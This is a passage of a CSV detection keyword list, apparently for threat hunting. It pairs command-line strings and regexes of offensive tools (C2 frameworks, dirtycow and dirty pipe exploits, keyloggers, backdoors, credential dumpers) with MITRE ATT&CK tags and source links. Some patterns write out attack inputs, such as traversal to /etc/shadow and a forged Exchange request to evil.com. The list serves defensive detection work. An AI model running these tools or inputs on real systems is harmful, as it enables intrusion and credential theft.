TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*",".{0,1000}\&\&\scat\s\/etc\/motd.{0,1000}exec\s\-a\s\-\$\(basename\s\$SHELL\)\s\$SHELL.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*(not launching GPOddity SMB server)*",".{0,1000}\(not\slaunching\sGPOddity\sSMB\sserver\).{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*(prog=""bpf-keylogger""*",".{0,1000}\(prog\=\""bpf\-keylogger\"".{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*. Nice assembly :D .*",".{0,1000}\.\sNice\sassembly\s\:D\s\..{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*.*autodiscover\.json.*Powershell.*",".{0,1000}\..{0,1000}autodiscover\\\.json\..{0,1000}Powershell\..{0,1000}","offensive_tool_keyword","POC","forged request. exemple: autodiscover/autodiscover.json?@evil.com/&Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tools","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*... every office needs a tool like Georg*",".{0,1000}\.\.\.\severy\soffice\sneeds\sa\stool\slike\sGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*../../../../../../etc/passwd*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*../../../../../../etc/shadow*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/shadow.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*./*octopus.py*",".{0,1000}\.\/.{0,1000}octopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*./agscript *",".{0,1000}\.\/agscript\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./agscript * nemesis-bot *",".{0,1000}\.\/agscript\s.{0,1000}\snemesis\-bot\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*./AutoSUID.sh*",".{0,1000}\.\/AutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./awsloot *",".{0,1000}\.\/awsloot\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*./awsloot.py*",".{0,1000}\.\/awsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*./backdoor.sh *",".{0,1000}\.\/backdoor\.sh\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*./Brutesploit*",".{0,1000}\.\/Brutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*./c2lint *",".{0,1000}\.\/c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*./chisel *",".{0,1000}\.\/chisel\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./cowpy.sh *",".{0,1000}\.\/cowpy\.sh\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*./cowroot*",".{0,1000}\.\/cowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","29","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" "*./dcow -s*",".{0,1000}\.\/dcow\s\-s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","4","307","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "*./Dent -*",".{0,1000}\.\/Dent\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*./dirty*",".{0,1000}\.\/dirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","9","817","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*./dnscat*",".{0,1000}\.\/dnscat.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*./dome.py*",".{0,1000}\.\/dome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*./donut *.exe*",".{0,1000}\.\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*./dynasty.sh*",".{0,1000}\.\/dynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*./evil-proxy*",".{0,1000}\.\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*./Exfil.sh*",".{0,1000}\.\/Exfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*./exploit /etc/passwd 1 *cat /etc/passwd*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\s.{0,1000}cat\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","0","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*./exploit /etc/passwd 1 ootz:*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\sootz\:.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*./fake-sms*",".{0,1000}\.\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*./fee.py*",".{0,1000}\.\/fee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*./gcr.py*",".{0,1000}\.\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*./getExploit*",".{0,1000}\.\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","44","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*./gimmeSH*",".{0,1000}\.\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","183","29","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*./go-secdump*",".{0,1000}\.\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*./GoStompy *",".{0,1000}\.\/GoStompy\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*./hashcat -*",".{0,1000}\.\/hashcat\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*./hashview/*",".{0,1000}\.\/hashview\/.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*./Havoc",".{0,1000}\.\/Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*./havoc *",".{0,1000}\.\/havoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*./hoaxshell*",".{0,1000}\.\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*./hping *",".{0,1000}\.\/hping\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*./hydra *",".{0,1000}\.\/hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*./inceptor.py*",".{0,1000}\.\/inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*./injector -*",".{0,1000}\.\/injector\s\-.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*./iodined*",".{0,1000}\.\/iodined.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*./Ivy -*",".{0,1000}\.\/Ivy\s\-.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*./kali-install.sh*",".{0,1000}\.\/kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*./kerbrute *",".{0,1000}\.\/kerbrute\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*./koadic*",".{0,1000}\.\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*./kubestroyer*",".{0,1000}\.\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*./Lalin.sh*",".{0,1000}\.\/Lalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*./litefuzz.py*",".{0,1000}\.\/litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*./logger.sh * &> /dev/null && exit*",".{0,1000}\.\/logger\.sh\s.{0,1000}\s\&\>\s\/dev\/null\s\&\&\sexit.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*./lse.sh*",".{0,1000}\.\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*./manjusaka*",".{0,1000}\.\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*./Microsploit*",".{0,1000}\.\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*./monkey.sh*",".{0,1000}\.\/monkey\.sh.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*./mythic-cli 